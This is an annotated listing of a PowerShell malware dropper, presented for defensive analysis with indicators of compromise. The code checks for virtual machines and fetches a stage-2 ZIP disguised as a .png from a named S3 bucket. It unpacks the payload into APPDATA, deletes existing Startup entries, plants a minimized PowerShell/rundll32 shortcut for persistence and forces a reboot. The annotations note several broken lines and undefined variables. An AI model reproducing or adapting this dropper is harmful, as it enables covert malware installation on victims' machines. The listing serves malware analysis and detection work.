# NOTE(review): this listing is a PowerShell dropper (not POSIX shell, despite the
# extension hint). It is annotated here for defensive analysis only -- do not run it
# outside an isolated, network-restricted lab.
#
# Stage-2 payload URL. The object is served under a .png name but is treated below as
# a ZIP archive (renamed to .zip and unpacked); the image extension is a disguise.
# Network IOC: public S3 bucket "juremasobra2" (eu-west-1), object "image2.png".
$maliciou_file = "https://s3-eu-west-1.amazonaws.com/juremasobra2/image2.png"
# The next three lines are not valid PowerShell assignments: without a leading `$`,
# `_.dll = "_.dll"` is parsed as an attempt to invoke a command named `_.dll` with
# two arguments. They look like damaged or deliberately broken lines; none of these
# names is read anywhere else in this listing.
_.dll = "_.dll"
_.prx = "_.prx"
MaxNotify = "MaxNotify"
# Anti-VM / sandbox-evasion check.
# Reads Win32_ComputerSystem.Model through WMI (gwmi = Get-WmiObject) and returns
# the string "Y" when it equals one of four hypervisor model strings -- VirtualBox,
# VMware, Hyper-V ("Virtual Machine"), Xen ("HVM domU") -- otherwise "N".
# Returns: the STRING "Y" or "N", never a boolean; see the caller at the bottom of
#   the file, where this matters.
# Analyst notes: -eq is case-insensitive, but only these four exact values are
#   tested. Other hypervisors' model strings, and any sandbox that spoofs the
#   Model property, are reported as "N" (i.e. "not a VM").
function is_in_VM
{
# get system model
# anti-VM technique
$system_model = gwmi -Class Win32_ComputerSystem | select -ExpandProperty Model
if ($system_model -eq "VirtualBox" -or
$system_model -eq "VMware Virtual Platform" -or
$system_model -eq "Virtual Machine" -or
$system_model -eq "HVM domU")
{
return "Y"
}
else
{
return "N"
}
}
# Builds a short random alphabetic string; the main body uses it as the base name
# for every dropped file (.txt / .zip / .vbs / .prx / _.dll).
# Intended behaviour: Get-Random -Minimum 1 -Maximum 9 yields 1..8, and the loop
# runs $random_num + 1 times, so the result is 2..9 letters drawn from the fixed
# alphabet in seed_string (upper- and lower-case ASCII letters only).
# Returns: the accumulated string in $final_str.
# NOTE(review): as written, the three lines inside the loop lack the leading `$`
# on seed_string / nomeRandomico_getrandom / caractereRandomico. PowerShell would
# treat the first two as command invocations, and the bare identifier after `+`
# on the last line is likely a parse error that stops the whole script from
# loading. Either this copy was altered in transcription or it is deliberately
# broken -- treat the logic above as "intended", not "observed", and confirm in
# a sandbox. The try/finally with an empty finally block catches nothing.
# Attribution hint only: mixed Portuguese (nomeRandomico, caractereRandomico) and
# English identifier names.
function get_random_str
{
try
{
$random_num = Get-Random -Minimum 1 -Maximum 9
$final_str = ""
For ($counter=0; $counter -le $random_num; $counter++)
{
seed_string = "qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
nomeRandomico_getrandom = Get-Random -Minimum 1 -Maximum seed_string.Length
caractereRandomico = seed_string.Substring(nomeRandomico_getrandom, 1)
$final_str = $final_str + caractereRandomico
}
return $final_str
}
finally{}
}
# Downloads $file_url to $file_path with a raw System.Net.HttpWebRequest.
# Parameters:
#   $file_url  - URL string. It is passed through ExpandString first, so any
#                `$variable` text embedded in it is interpolated a second time.
#   $file_path - destination path; the FileStream is opened with FileMode Create,
#                so an existing file is truncated.
# Returns: the literal "Y" whenever the function runs to completion. There is no
#   error handling: a connection failure or a 4xx/5xx response (which GetResponse()
#   raises as a WebException) propagates to the caller uncaught.
# Analyst notes:
#   - 15 s request timeout; 10 KB read buffer; stream copied, flushed, closed.
#   - $content_len and $total_read_len are computed but never checked; the only
#     size validation happens in the caller (Get-Item length > 2048 KB).
#   - No User-Agent, proxy or certificate-validation override is set here, so the
#     request goes out with the host's .NET defaults -- useful when writing a
#     network signature for the S3 fetch.
function download_file($file_url, $file_path)
{
$web_service = New-Object "System.Uri" $ExecutionContext.InvokeCommand.ExpandString($file_url)
$http_client = [System.Net.HttpWebRequest]::Create($web_service)
$http_client.set_Timeout(15000)
$http_res = $http_client.GetResponse()
$content_len = [System.Math]::Floor($http_res.get_ContentLength()/1024)
$http_res_stream = $http_res.GetResponseStream()
$file_obj = New-Object -TypeName System.IO.FileStream -ArgumentList $file_path, Create
$read_content = new-object byte[] 10KB
$read_len = $http_res_stream.Read($read_content,0,$read_content.length)
$total_read_len = $read_len
while ($read_len -gt 0)
{
$file_obj.Write($read_content, 0, $read_len)
$read_len = $http_res_stream.Read($read_content,0,$read_content.length)
$total_read_len = $total_read_len + $read_len
}
$file_obj.Flush()
$file_obj.Close()
$file_obj.Dispose()
$http_res_stream.Dispose()
return "Y"
}
# Persistence helper: writes a Windows shortcut (.lnk) that launches PowerShell.
# Parameters:
#   $lnk_file_path   - where to write the .lnk (the caller passes the user's
#                      Startup folder).
#   $target_argument - PowerShell command line. It goes through ExpandString here,
#                      so `$variables` in it are resolved at creation time and the
#                      concrete command is baked into the .lnk as literal text.
# Shortcut properties set:
#   TargetPath       'powershell' -- bare name, resolved via PATH at logon.
#   WorkingDirectory %SystemRoot%\System32
#   WindowStyle      7 (minimized) -- no visible console window at logon.
#   IconLocation     Internet Explorer's icon, a cosmetic disguise so the entry
#                    looks like a browser shortcut.
# try/finally with an empty finally catches nothing; errors propagate.
# Detection: a .lnk in the per-user Startup folder (typically
# %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) whose target is
# powershell with rundll32 in its arguments is a high-signal indicator.
function create_lnk_file
{
Param([string]$lnk_file_path,[string]$target_argument);
try{
$wshell_obj = New-Object -ComObject WScript.Shell
$shortcut_lnk_file = $wshell_obj.CreateShortcut($lnk_file_path)
$shortcut_lnk_file.TargetPath = 'powershell'
$shortcut_lnk_file.Arguments = $ExecutionContext.InvokeCommand.ExpandString("$target_argument")
$shortcut_lnk_file.WorkingDirectory = "%SystemRoot%\System32"
$shortcut_lnk_file.WindowStyle = 7
$shortcut_lnk_file.IconLocation = "%ProgramFiles%\Internet Explorer\iexplore.exe,1"
$shortcut_lnk_file.Save()
}finally{}
}
# Single-instance guard. Creates or opens a named mutex and tries to acquire it.
# Returns: the result of WaitOne() -- $true once the mutex is held. WaitOne() is
#   called with no timeout, so if another instance already holds the mutex this
#   call blocks indefinitely rather than returning $false.
# Scope: the name has no "Global\" prefix, so the mutex lives in the current
#   session's namespace, not machine-wide. The handle is never released or
#   disposed; it stays held for the life of the process.
# Host IOC: mutex name "444444444444".
function create_mutex
{
try
{
$mutex_obj = New-Object System.Threading.Mutex($false, "444444444444")
return $mutex_obj.WaitOne()
}finally{}
}
# Main Code body
# Flow: VM gate -> single-instance gate -> download -> unpack -> rename -> plant
# Startup .lnk -> forced reboot.
# NOTE(review): `is_in_VM -eq "N"` is command syntax, not a comparison. PowerShell
# invokes is_in_VM with "-eq" and "N" as positional arguments (they land in $args),
# and the `if` tests the function's return value -- "Y" or "N", both non-empty
# strings, both truthy. As written the anti-VM gate therefore appears to be a
# no-op and the dropper would proceed inside a VM too; confirm in a sandbox before
# relying on this for triage.
if (is_in_VM -eq "N") {
# Single-instance gate on the session-scoped mutex "444444444444" (see create_mutex).
if (create_mutex) {
# Kills Windows Media Player if running. The reason is not visible in this
# listing; do not assume a link to the dropped DLL without evidence.
stop-process -name wmplayer
# Every dropped artifact lands directly in %APPDATA% under a random base name.
$APP_DATA_PATH = ${env:APPDATA}+"\"
$random_str = get_random_str
$dropfile_txt = $APP_DATA_PATH + $random_str + ".txt"
# Obfuscated variable name (slash/equals "art"). Assigned a .vbs path but never
# read anywhere in this listing.
${/=\__/=\___/===\_} = $APP_DATA_PATH + $random_str + ".vbs"
sleep -s 1
# Retry loop: re-download every second until the file on disk exceeds 2048 KB.
# No retry cap and no exception handling: a network error surfaces as an
# unhandled exception, and a reachable server returning something small means an
# infinite loop. The 2 MB threshold is the only integrity check on the payload --
# no hash, no signature, no content-type check.
$counter = $false
while($counter -ne $true) {
download_file $maliciou_file $dropfile_txt; sleep -s 1
if ((gi $dropfile_txt).length -gt 2048kb){
$counter = $true
$is_download_complete = "Y"
}else{
$is_download_complete = "N"
}
Write-Host $counter
}
# Dead logic: $is_download_complete is unconditionally reset to "Y" here, so the
# following `if` always passes (the loop above already guarantees the size).
$is_download_complete = "Y"
if ($is_download_complete -eq "Y") {
# .txt -> .zip rename, then extraction through the Shell.Application COM object
# rather than Expand-Archive / System.IO.Compression. Folder.CopyHere can return
# before the copy is finished; the 3 s sleeps below are the only synchronisation.
$dropfile_zip_new_name = $APP_DATA_PATH+$random_str + ".zip"
ren -Path $ExecutionContext.InvokeCommand.ExpandString("$dropfile_txt") -NewName $ExecutionContext.InvokeCommand.ExpandString("$dropfile_zip_new_name");
$cmd_shell_obj = New-Object -ComObject shell.application
$zip_folder = $cmd_shell_obj.NameSpace($dropfile_zip_new_name)
foreach ($folder_file in $zip_folder.items()){
$cmd_shell_obj.Namespace($APP_DATA_PATH).CopyHere($folder_file)
}
sleep -s 3
# Second random base name for the unpacked components: <rand>.prx and <rand>_.dll.
$randome_str_1 = get_random_str
$prx_file = $randome_str_1 + ".prx"
$dll_file = $randome_str_1 + "_.dll"
# The two obfuscated variables in the -Path arguments are meant to hold the
# original member names inside the archive. They are not defined anywhere in this
# listing (set elsewhere or stripped), so the pre-rename names cannot be recovered
# from this copy; as written they expand to empty and the renames would fail.
ren -Path $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\${_/\/\_/\_/=\/====}") -NewName $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\$dll_file");
ren -Path $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\${_/\____/=\/\_/===}") -NewName $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\$prx_file");
sleep -s 3
cd $env:APPDATA ;
# Missing `$` again: `shellObjeto = ...` is parsed as a command invocation, and the
# next line's `shellObjeto.SpecialFolders.Item(...)` as another, so as written this
# section fails at runtime. Intended behaviour: resolve the per-user Startup
# folder via WScript.Shell.SpecialFolders("startup").
shellObjeto = New-Object -Com WScript.Shell
$startup_folder = shellObjeto.SpecialFolders.Item("startup");
# Wipes every .vbs and .lnk already in the user's Startup folder before planting
# its own -- clears earlier versions of itself (and any legitimate entries).
del $startup_folder\*.vbs
del $startup_folder\*.lnk
# Persistence payload. At logon the .lnk runs:
#   powershell  cd <APPDATA>; Start-Process rundll32.exe <rand>_.dll, <export>
# where <export> is the obfuscated variable ${___/=\/\/\_____/=}, undefined in this
# listing -- the DLL entry-point name is not recoverable from this copy. Because
# the double-quoted string is expanded by the parser and then again by
# ExpandString, the finished .lnk carries the concrete file and export names as
# literal text: on an infected host, pull IOCs from the .lnk's Arguments field.
$target_args = $ExecutionContext.InvokeCommand.ExpandString("cd $env:APPDATA; Start-Process rundll32.exe $dll_file, ${___/=\/\/\_____/=}")
# The .lnk is named after the .prx file: <rand>.prx.lnk in the Startup folder.
$target_lnk_file_path = $ExecutionContext.InvokeCommand.ExpandString("$startup_folder\$prx_file.lnk")
create_lnk_file $target_lnk_file_path $target_args
# 40 s grace period, then a forced reboot with no user warning so the Startup
# .lnk fires. The reboot is a loud, loggable event (on Windows this is normally
# recorded as a USER32 shutdown event attributed to the initiating process --
# verify the exact event on your platform).
sleep -s 40
Restart-Computer -Force
}
}
}